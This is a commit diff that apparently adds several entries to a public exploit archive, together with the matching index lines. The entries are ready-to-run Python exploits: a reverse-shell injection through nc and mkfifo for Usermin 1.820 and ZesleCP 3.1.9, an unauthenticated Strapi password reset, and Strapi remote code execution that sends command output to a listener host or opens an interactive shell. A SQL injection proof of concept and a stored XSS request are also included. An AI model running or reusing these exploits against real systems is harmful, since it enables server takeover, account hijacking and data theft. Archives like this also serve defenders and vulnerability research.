DB: 2021-08-31

8 changes to exploits/shellcodes MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated) Usermin 1.820 - Remote Code Execution (RCE) (Authenticated) Bus Pass Management System 1.0 - 'viewid' SQL Injection Strapi 3.0.0-beta - Set Password (Unauthenticated) Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) Projectsend r1295 - 'name' Stored XSS
2021-08-31 05:01:56 +00:00 · 2021-08-31 05:01:56 +00:00 · 32e384bbf0
commit 32e384bbf0
parent ac4322c402
9 changed files with 568 additions and 0 deletions
--- a/exploits/linux/local/50236.py
+++ b/exploits/linux/local/50236.py
--- a/exploits/linux/webapps/50234.py
+++ b/exploits/linux/webapps/50234.py
@ -0,0 +1,102 @@
+# Title: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)
+# Date: 27.08.2021
+# Author: Numan Türle
+# Vendor Homepage: https://www.webmin.com/usermin.html
+# Software Link: https://github.com/webmin/usermin
+# Version: <=1820
+# https://www.youtube.com/watch?v=wiRIWFAhz24
+
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
+# author: twitter.com/numanturle
+# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
+# https://youtu.be/wiRIWFAhz24
+
+
+import argparse,requests,warnings,json,re
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from cmd import Cmd
+
+warnings.simplefilter('ignore',InsecureRequestWarning)
+
+def init():
+    parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
+    parser.add_argument('-u','--host',help='Host', type=str, required=True)
+    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
+    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
+    args = parser.parse_args()
+    exploit(args)
+
+def exploit(args):
+
+    listen_ip = "0.0.0.0"
+    listen_port = 1337
+
+    session = requests.Session()
+    target = "https://{}:20000".format(args.host)
+    username = args.login
+    password = args.password
+
+    print("[+] Target {}".format(target))
+
+    headers = {
+        'Cookie': 'redirect=1; testing=1;',
+        'Referer': target
+    }
+
+    login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password})
+    login_content = str(login.content)
+    search = "webmin_search.cgi"
+    check_login_string = re.findall(search,login_content)
+    if check_login_string:
+        session_hand_login = session.cookies.get_dict()
+
+        print("[+] Login successfully")
+        print("[+] Setup GnuPG")
+
+        payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip,listen_port)
+        #payload = "whoami;"
+        post_data = {
+            "name":'";{}echo "'.format(payload),
+            "email":"1337@webmin.com",
+        }
+        
+        print("[+] Payload {}".format(post_data))
+
+        session.headers.update({'referer': target})
+        
+        create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data)
+        create_secret_content = str(create_secret.content)
+
+        search = "successfully"
+        check_exp = re.findall(search,create_secret_content)
+        
+        if check_exp:
+            
+            print("[+] Setup successful")
+            print("[+] Fetching key list")
+            
+            session.headers.update({'referer': target})
+            key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False)
+            last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
+            print("[+] Key : {}".format(last_gets_key))
+
+            session.headers.update({'referer': target})
+            try:
+                key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)
+            except requests.exceptions.ReadTimeout:
+                pass
+
+            print("[+] 5ucc355fully_3xpl017")
+        else:
+            print("[-] an unexpected error occurred"  )
+
+
+
+        
+    else:
+        print("[-] AUTH : Login failed.")
+
+if __name__ == "__main__":
+    init()
--- a/exploits/multiple/webapps/50233.py
+++ b/exploits/multiple/webapps/50233.py
@ -0,0 +1,73 @@
+# Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
+# Date: 27.08.2021
+# Author: Numan Türle
+# Vendor Homepage: https://zeslecp.com/
+# Software Link: https://zeslecp.com/
+# Version: <=3.1.9
+# https://www.youtube.com/watch?v=5lTDTEBVq-0
+
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
+# author: twitter.com/numanturle
+# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
+# https://www.youtube.com/watch?v=5lTDTEBVq-0
+
+
+import argparse,requests,warnings,json,random,string
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from cmd import Cmd
+
+warnings.simplefilter('ignore',InsecureRequestWarning)
+
+def init():
+    parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')
+    parser.add_argument('-u','--host',help='Host', type=str, required=True)
+    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
+    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
+    args = parser.parse_args()
+    exploit(args)
+
+def exploit(args):
+
+    listen_ip = "0.0.0.0"
+    listen_port = 1337
+
+    session = requests.Session()
+    target = "https://{}:2087".format(args.host)
+    username = args.login
+    password = args.password
+
+    print("[+] Target {}".format(target))
+
+    login = session.post(target+"/login", verify=False, json={"username":username,"password":password})
+    login_json = json.loads(login.content)
+
+    if login_json["success"]:
+        session_hand_login = session.cookies.get_dict()
+
+        print("[+] Login successfully")
+        print("[+] Creating ftp account")
+
+        ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
+
+        print("[+] Username : {}".format(ftp_username))
+        
+        print("[+] Send payload....")
+
+        payload = {
+            "ftp_user": ftp_username,
+            "ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)
+        }
+
+        try:
+            feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3)
+        except requests.exceptions.ReadTimeout: 
+            pass
+
+            print("[+] Successful")
+    else:
+        print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
+
+if __name__ == "__main__":
+    init()
--- a/exploits/multiple/webapps/50237.py
+++ b/exploits/multiple/webapps/50237.py
@ -0,0 +1,46 @@
+# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
+# Date: 2021-08-29
+# Exploit Author: David Anglada [CodiObert]
+# Vendor Homepage: https://strapi.io/
+# Version: 3.0.0-beta
+# Tested on: Linux
+# CVE: CVE-2019-18818
+
+#!/usr/bin/python
+
+import requests
+import sys
+import json
+
+userEmail = "valid@email.com"
+strapiUrl = "http://strapi.url"
+newPassword = "codiobert"
+
+s = requests.Session()
+
+# Get strapi version
+strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)
+
+print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))
+
+# Validate vulnerable version
+if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
+	# Password reset
+	print("[*] Password reset for user: {}".format(userEmail))
+	resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)}
+	s.post("{}/".format(strapiUrl), json=resetPasswordReq)
+
+	# Set new password
+	print("[*] Setting new password")
+	exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword}
+	r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)
+
+	# Check if the password has changed
+	if "username" in str(r.content):
+		print("[+] New password '{}' set for user {}".format(newPassword, userEmail))
+	else:
+		print("\033[91m[-] Something went wrong\033[0m")
+		sys.exit(1)
+else:
+	print("\033[91m[-] This version is not vulnerable\033[0m")
+	sys.exit(1)
--- a/exploits/multiple/webapps/50238.py
+++ b/exploits/multiple/webapps/50238.py
@ -0,0 +1,65 @@
+# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
+# Date: 29/08/2021
+# Exploit Author: David Utón (M3n0sD0n4ld)
+# Vendor Homepage: https://strapi.io/
+# Affected Version: strapi-3.0.0-beta.17.7 and earlier
+# Tested on: Linux Ubuntu 18.04.5 LTS
+# CVE : CVE-2019-19609
+
+#!/usr/bin/python3
+# Author: @David_Uton (m3n0sd0n4ld)
+# Github: https://m3n0sd0n4ld.github.io
+# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
+
+import requests, sys, os, socket
+
+logoType = ('''
+=====================================
+CVE-2019-19609 - Strapi RCE
+-------------------------------------
+@David_Uton (M3n0sD0n4ld)
+https://m3n0sd0n4ld.github.io/
+=====================================
+		''')
+
+if __name__ == '__main__':
+
+	# Parameter checking
+	if len(sys.argv) != 5:
+		print(logoType)
+		print("[!] Some of these parameters are missing.")
+		print('''
+		Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
+		Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0])
+	# Exploit run
+	else:
+		# Paremeters
+		url = sys.argv[1]
+		token = sys.argv[2]
+		command = sys.argv[3]
+		lhost = sys.argv[4]
+		lport = 9999
+		
+		s = requests.session()
+		
+		r = s.post(url, verify=False) # SSL == verify=True
+		
+		headersData = {
+			'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
+			'Authorization': "Bearer %s" % token
+		}
+
+		postData = {
+			"plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport)
+		}
+		
+		print(logoType)
+		os.system("nc -nvlp 9999 &")
+		try:
+			print("[+] Successful operation!!!")
+			r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True
+			# Content print
+			print(r.text)
+		except:
+			print("[!] An error occurred, try again.")
+			sys.exit(1)
--- a/exploits/multiple/webapps/50239.py
+++ b/exploits/multiple/webapps/50239.py
@ -0,0 +1,74 @@
+# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 2021-08-30
+# Exploit Author: Musyoka Ian
+# Vendor Homepage: https://strapi.io/
+# Software Link: https://strapi.io/
+# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2019-18818, CVE-2019-19609
+
+#!/usr/bin/env python3
+
+import requests
+import json
+from cmd import Cmd
+import sys
+
+if len(sys.argv) != 2:
+    print("[-] Wrong number of arguments provided")
+    print("[*] Usage: python3 exploit.py <URL>\n")
+    sys.exit()
+
+
+class Terminal(Cmd):
+    prompt = "$> "
+    def default(self, args):
+        code_exec(args)
+
+def check_version():
+    global url
+    print("[+] Checking Strapi CMS Version running")
+    version = requests.get(f"{url}/admin/init").text
+    version = json.loads(version)
+    version = version["data"]["strapiVersion"]
+    if version == "3.0.0-beta.17.4":
+        print("[+] Seems like the exploit will work!!!\n[+] Executing exploit\n\n")
+    else:
+        print("[-] Version mismatch trying the exploit anyway")
+
+
+def password_reset():
+    global url, jwt
+    session = requests.session()
+    params = {"code" : {"$gt":0},
+            "password" : "SuperStrongPassword1",
+            "passwordConfirmation" : "SuperStrongPassword1"
+            }
+    output = session.post(f"{url}/admin/auth/reset-password", json = params).text
+    response = json.loads(output)
+    jwt = response["jwt"]
+    username = response["user"]["username"]
+    email = response["user"]["email"]
+
+    if "jwt" not in output:
+        print("[-] Password reset unsuccessfull\n[-] Exiting now\n\n")
+        sys.exit(1)
+    else:
+        print(f"[+] Password reset was successfully\n[+] Your email is: {email}\n[+] Your new credentials are: {username}:SuperStrongPassword1\n[+] Your authenticated JSON Web Token: {jwt}\n\n")
+def code_exec(cmd):
+    global jwt, url
+    print("[+] Triggering Remote code executin\n[*] Rember this is a blind RCE don't expect to see output")
+    headers = {"Authorization" : f"Bearer {jwt}"}
+    data = {"plugin" : f"documentation && $({cmd})",
+            "port" : "1337"}
+    out = requests.post(f"{url}/admin/plugins/install", json = data, headers = headers)
+    print(out.text)
+
+if __name__ == ("__main__"):
+    url = sys.argv[1]
+    if url.endswith("/"):
+        url = url[:-1]
+    check_version()
+    password_reset()
+    terminal = Terminal()
+    terminal.cmdloop()
--- a/exploits/php/webapps/50235.txt
+++ b/exploits/php/webapps/50235.txt
@ -0,0 +1,24 @@
+# Exploit Title: Bus Pass Management System 1.0 - 'viewid' SQL Injection
+# Date: 2021-08-28
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
+# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
+# Version: 1.0
+# Tested on: Windows 10 - Wamp Server
+
+# Vulnerable page :
+
+http://localhost/buspassms/admin/view-pass-detail.php?viewid=
+
+# Vulnerable paramater :
+
+The viewid paramater is Vulnerable to sqli
+
+# Proof Of Concept :
+
+# 1 . Download And install [ bus-pass-management-system ]
+# 2 . Go to /admin/index.php and Enter Username & Password 
+# 3 . Navigate to passes >> manage pass
+# 4 . Click on the view and enter the sql payload into the Url
+
+Use : http://localhost/buspassms/admin/view-pass-detail.php?viewid=1'[Sql Payload]
--- a/exploits/php/webapps/50240.txt
+++ b/exploits/php/webapps/50240.txt
@ -0,0 +1,60 @@
+# Exploit Title: Projectsend r1295 - 'name' Stored XSS 
+# Date: 30.08.2021
+# Exploit Author: Abdullah Kala
+# Vendor Homepage: https://www.projectsend.org/
+# Software Link: https://www.projectsend.org/download/387/
+# Version: r1295
+# Tested on: Ubuntu 18.04 
+# Description: Firstly add client group. After uploading the file from the user with any role, payload is written in the "title" part of the redirected page, add group your created and save. For users with the "System Administrator" role, xss is triggered on the "Dashboard" page.
+
+POST /projectsend/files-edit.php?ids=1 HTTP/1.1
+Host: 10.10.10.55
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------36890316955266305672634658708
+Content-Length: 1323
+Origin: http://10.10.10.55
+Connection: close
+Referer: http://10.10.10.55/projectsend/files-edit.php?ids=5
+Cookie: menu_contracted=false; PHPSESSID=kvip7m24ib2d062hcaut3fbr2o
+Upgrade-Insecure-Requests: 1
+
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="csrf_token"
+
+f53a148f0f952cb00c7e7edc63be5a3efd911d5c27de15eb78c7323a6d7b3c02
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="file[1][id]"
+
+1
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="file[1][original]"
+
+test.png
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="file[1][file]"
+
+1630247451-f2d3f09150beb76c7f2c83dc27732a0b23718875-kudur.png
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="file[1][name]"
+
+<script>alert(1)</script>
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="file[1][description]"
+
+test
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="file[1][expiry_date]"
+
+28-09-2021
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="file[1][assignments][groups][]"
+
+1
+-----------------------------36890316955266305672634658708
+Content-Disposition: form-data; name="save"
+
+
+-----------------------------36890316955266305672634658708--
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11380,6 +11380,7 @@ id,file,description,date,author,type,platform,port
 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",2021-08-10,"Andrea Intilangelo",local,windows,
 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",2021-08-10,"Vishwaraj Bhattrai",local,android,
 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 -  Unquoted Service Path",2021-08-17,shinnai,local,windows,
+50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",2021-08-30,ninpwn,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44357,3 +44358,10 @@ id,file,description,date,author,type,platform,port
 50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,
 50231,exploits/hardware/webapps/50231.txt,"COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,
 50232,exploits/hardware/webapps/50232.txt,"COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,
+50233,exploits/multiple/webapps/50233.py,"ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"numan türle",webapps,multiple,
+50234,exploits/linux/webapps/50234.py,"Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"numan türle",webapps,linux,
+50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,
+50237,exploits/multiple/webapps/50237.py,"Strapi 3.0.0-beta - Set Password (Unauthenticated)",2021-08-30,"David Anglada",webapps,multiple,
+50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"David Utón",webapps,multiple,
+50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-30,"Musyoka Ian",webapps,multiple,
+50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,